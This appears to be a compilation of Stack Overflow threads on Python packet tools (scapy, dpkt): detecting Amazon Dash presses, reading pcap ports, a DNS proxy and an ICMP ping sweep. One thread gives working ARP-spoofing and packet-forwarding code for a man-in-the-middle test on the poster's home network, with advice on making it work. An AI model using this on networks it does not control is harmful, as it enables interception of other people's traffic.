I am having some trouble finding working code to find ARP requests sent out by an Amazon dash button. I tried Ted Benson's code, and also this code here, but neither seem to be working.
Ted's code:
from scapy.all import *
def arp_display(pkt):
if pkt[ARP].op == 1: #who-has (request)
if pkt[ARP].psrc == '0.0.0.0': # ARP Probe
print("ARP Probe from: " + pkt[ARP].hwsrc)
print(sniff(prn=arp_display, filter="arp", store=0, count=10))
The issue I am having is with the line scapy.all import *. I get a long list of explanation, but the last line of the error is
import dnet ImportError: No module named dnet.
The second code I tried is
import socket
import struct
import binascii
# Written by Bob Steinbeiser (https://medium.com/#xtalker)
rawSocket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW,
socket.htons(0x0003))
MAC = '74c24671971c'
while True:
packet = rawSocket.recvfrom(2048)
ethernet_header = packet[0][0:14]
ethernet_detailed = struct.unpack('!6s6s2s', ethernet_header)
arp_header = packet[0][14:42]
arp_detailed = struct.unpack('2s2s1s1s2s6s4s6s4s', arp_header)
# skip non-ARP packets
ethertype = ethernet_detailed[2]
if ethertype != '\x08\x06':
continue
source_mac = binascii.hexlify(arp_detailed[5])
dest_ip = socket.inet_ntoa(arp_detailed[8])
if source_mac == MAC:
print "Dash button pressed!, IP = " + dest_ip
This is the error I am getting: 'AttributeError: 'module' object has no attribute 'AF_PACKET''.
I have tried both code in python 2.7 and 3.4 and it neither work. Please let me know if there is anything I can do, or any code I can re-appropriate.
For the first example, you are probably missing the libdnet dependency, as discussed in this SO answer.
Also, note that a different approach is required to detect newer model Dash buttons (listening for DHCP requests rather than ARP requests). I describe the solution in this answer.
Related
Hi everyone this is my first time doing PCAP programming using Python for the programming language, this is for a task for University and I have mostly got everything I need to complete the task except for one small detail.
I just need to get an output of the source and destination port numbers (HTTP Port 80 for example) associated with the IP addresses.
I'm happy for the answer to be a pointer to the right direction to help me work it out for myself. Otherwise if it's easier for it to be just answered, I would like a basic explanation on what was used and how it resolves the problem so I can understand it better for when I do more future PCAP programming in my studies and research.
This is being utilized on a Unix system running FreeBSD 10.3
I have tried using dpkt.tcp, dpkt.udp, dpkt.ip libraries as well as tried some socket libraries to see if I can achieve the result I am looking for, but not having much luck. I'll be honest, I'm not sure what I need to use.
EDIT: I did try using tcp.sport and tcp.dport, still had no luck.
The main area of focus is where I have added the comments.
import datetime
import time
import sys
import dpkt
import socket
def printPcap(pcap):
for (ts,buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
if eth.type == dpkt.ethernet.ETH_TYPE_IP:
ip = eth.data
ipsrc = socket.inet_ntoa(ip.src)
ipdst = socket.inet_ntoa(ip.dst)
srcport = ??? ###Stuck here for source port
dstport = ??? ###Stuck here for destination port
if ip.p == dpkt.ip.IP_PROTO_TCP:
TCP = ip.data
iptype = 'tcp'
elif ip.p == dpkt.ip.IP_PROTO_UDP:
UDP = ip.data
iptype = 'udp'
len = str(ip.len)
ttl = str(ip.ttl)
###My current output
print '[' +str(datetime.datetime.utcfromtimestamp(ts))+ '] - ' \
+ipsrc+ ':' +srcport+ ' -> ' +ipdst+ ':' +dstport+ \
' ('+iptype+', len='+len+', ttl='+ttl+')'
except:
pass
SAMPLE EXPECTED OUTPUT:
[2018-08-16 02:48:10.238506] - 172.16.11.2:61016 -> 172.16.10.2:80 (tcp, len=52, ttl=63)
The problem is that your print statement is bogus, but you've hidden that with the "bare except". Using the bare except is considered very poor practice in python for exactly this reason. See also answers to this question: Should I always specify an exception type in `except` statements?
Specifically, your print statement is attempting to concatenate an integer to a string which isn't valid.
So, repaired, and with:
if ip.p == dpkt.ip.IP_PROTO_TCP:
TCP = ip.data
iptype = 'tcp'
srcport = TCP.sport
dstport = TCP.dport
elif ip.p == dpkt.ip.IP_PROTO_UDP:
UDP = ip.data
iptype = 'udp'
srcport = UDP.sport
dstport = UDP.dport
and this print statement, it works:
print("[{}] - {}:{} -> {}:{} ({}, len={}, ttl={})".format(
datetime.datetime.utcfromtimestamp(ts), ipsrc, srcport,
ipdst, dstport, iptype, len, ttl))
Finally, at the very least, I would change your except clause to something like this to detect such issues in the future:
except Exception as exc:
print("Exception: {}".format(exc))
(Note that I've used the python3-compatible print function syntax here, which also works fine with python2's print statement.)
EDIT:
One other thing just occurred to me. If the first IP packet encountered is neither TCP or UDP, srcport and dstport will not be defined and that will cause an AttributeError exception. Leaving that for you to clean up.
Perhaps use ip.data to get the TCP packet and the sport and/or dport?
ip = eth.data
if ip.p == dpkt.ip.IP_PROTO_TCP:
tcp = ip.data
print('source port: {}, dest port: {}'.format(tcp.sport, tcp.dport))
I have the following running (finally after installing libnet etc) on my Mac trying to listen for a Dash button's MAC address:
from scapy.all import *
def arp_display(pkt):
if pkt[ARP].op == 1: #who-has (request)
if pkt[ARP].psrc == '0.0.0.0': # ARP Probe
print ("ARP Probe from: " + pkt[ARP].hwsrc)
print (sniff(prn=arp_display, filter="arp", store=0, count=300))
However, this just runs indefinitely and nothing is picked up even after numerous presses on the Dash and many other devices connecting and disconnecting.
I tried the following too
from scapy.all import *
print (sniff(filter="arp",count=10).summary())
Which also yields no results. Nothing I find online tells me what might be causing this.
Any ideas? Or even how I could debug?
The new buttons don't put out the same ARP request as the old ones. Remove this line and it should work.
if pkt[ARP].psrc == '0.0.0.0': # ARP Probe
I'm working on creating a proxy server using Python and scapy. TCP packets seem to be working fine but I'm running into some issues with UDP, specifically DNS requests. Essentially when a DNS request comes in I capture it in my script, preform the DNS lookup, and am trying to return it back to the person requesting the DNS query. The script successfully preforms the lookup and returns the DNS response, however when looking at wireshark it tells me it's a "Malformed Packet". Could someone tell me what I need to do in order to correctly return the DNS response?
#!/usr/bin/env python
from tornado.websocket import WebSocketHandler
from tornado.httpserver import HTTPServer
from tornado.web import Application
from tornado.ioloop import IOLoop
from collections import defaultdict
from scapy.all import *
import threading
outbound_udp = defaultdict(int)
connection = None
class PacketSniffer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
global connection
while (True):
pkt = sniff(iface="eth0", count=1)
if pkt[0].haslayer(DNS):
print "Returning back has UDP"
print pkt.summary()
ipPacket = pkt[0][IP]
dnsPacket = pkt[0][DNS]
if outbound_udp[(ipPacket.src, dnsPacket.id)] > 0:
outbound_udp[(ipPacket.src, dnsPacket.id)] -= 1
print "Found in outbound_udp"
# Modify the destination address back to the address of the TUN on the host.
ipPacket.dst = "10.0.0.1"
try:
del ipPacket[TCP].chksum
del ipPacket[IP].chksum
del ipPacket[UDP].chksum
except IndexError:
print ""
ipPacket.show2() # Force recompute the checksum
if connection:
connection.write_message(str(ipPacket).encode('base64'))
sniffingThread = PacketSniffer()
sniffingThread.daemon = True
sniffingThread.start()
Some bugs have been fixed recently in Scapy around DNS (and other sophisticated protocols, but DNS is the most frequently seen):
https://bitbucket.org/secdev/scapy/issue/913/
https://bitbucket.org/secdev/scapy/issue/5104/
https://bitbucket.org/secdev/scapy/issue/5105/
Trying with the latest Scapy development version from the Mercurial repository (hg clone http://bb.secdev.org/scapy) should fix this.
I'm just learning python with scapy. I read and use the book "Network Hacks - Intensivkurs - Angriff und Verteidigung mit Python" (German).
I would like to try a man in the middle attack by using arp-spoofing.
I have My Computer, the victim (my raspberry pi) and the standard gateway.
To spoofing, i use a code snippet from the book
#!/usr/bin/python
import sys
import time
from scapy.all import sniff, sendp, ARP, Ether
if len(sys.argv) < 3:
print sys.argv[0] + " <target> <spoof_ip>"
sys.exit(0)
iface = "wlan1"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]
ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp
while True:
sendp(packet, iface=iface)
time.sleep(10)
It works, my victim shows my mac as gateway.
The victim sends packets with the correct ip but my mac address.
Now the victim should open a website (wget http//example.com) and I want to use Wireshark to read the traffic. But I have to redirect the packages (DNS and TCP/HTTP). I tried it with this code:
#!/etc/usr/python
from scapy.all import *
import sys
iface = "wlan1"
filter = "ip"
VICTIM_IP = "192.168.2.108"
MY_IP = "192.168.2.104"
GATEWAY_IP = "192.168.2.1"
VICTIM_MAC = "### don't want so show###"
MY_MAC = "### don't want so show###"
GATEWAY_MAC = "### don't want so show###"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
packet[Ether].dst = GATEWAY_MAC
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
Wireshark shows a packet with the correct datas (IP Source = Victim IP, IP Destination = Gateway IP, MAC Source = Victim MAC, MAC Destination = Gateway MAC).
The Gateway is a DSL-Router, so also a "DNS-Server".
But my Raspberry doesn't receive a DNS response. What's my fault?
Yours faithfully,
MatStorm
One thing Scapy does not do for you is handle firewall issues; in this situation you would be well served to turn off the host firewall on your attacking host. The packets you're crafting aren't using the usual path for packets.
Also, are you translating the source address when you forward the packets on so that the response comes to you? I don't see that in the code...
Check if monitor mode is on the fake dns server interface. I cannot see from your code if that is done so just a quick tip. I will look closer after some sleep and can see straight. When I did spoofing last time, I had 1 ethernet cable with internet in router and monitor mode on wlan. if I tried without it showed some wanted info but just not right, cant remember for sure what I did to fix it. best of luck.
I'm attempting to write a Python script which uses the Scapy module to ping an internal IP range to determine which IP's are online. I've got this so far:
#!/usr/bin/python
from scapy.all import *
conf.verb = 0
for ip in range(0, 256):
packet = IP(dst="192.168.0." + str(ip), ttl=20)/ICMP()
reply = sr1(packet)
if "192.168." in reply.src:
print reply.src, "is online"
And the program will sit for a while doing nothing, and then if I kill it with CTRL+C I get an error message:
Traceback (most recent call last):
File "sweep.py", line 7, in <module>
if "192.168." in reply.src:
AttributeError: 'NoneType' object has no attribute 'src'
However if I try it with a single IP address, instead of a range, it works. Like this:
#!/usr/bin/python
from scapy.all import *
conf.verb = 0
packet = IP(dst="192.168.0.195", ttl=20)/ICMP()
reply = sr1(packet)
if "192.168." in reply.src:
print reply.src, "is online"
Anyone know how I can fix this problem? Or do you have any other ideas on how I can ping an IP range with Scapy, to determine which hosts are online?
You just need to ensure that reply is not NoneType as illustrated below... sr1() returns None if you get a timeout waiting for the response. You should also add a timeout to sr1(), the default timeout is quite absurd for your purposes.
#!/usr/bin/python
from scapy.all import *
TIMEOUT = 2
conf.verb = 0
for ip in range(0, 256):
packet = IP(dst="192.168.0." + str(ip), ttl=20)/ICMP()
reply = sr1(packet, timeout=TIMEOUT)
if not (reply is None):
print reply.dst, "is online"
else:
print "Timeout waiting for %s" % packet[IP].dst
You can't show reply.src field if the return of variable is null. In other words, you need to validate if the variable has return with some value (if the ping was successful). You can make an IF condition to get the .src field only when variable is not null.
FTR, Scapy supports implicit generators.
This works:
ans, unans = sr(IP(dst="192.169.0.1-255")/ICMP(), timeout=2)
Then iterate through the answers.
It is probably much better :)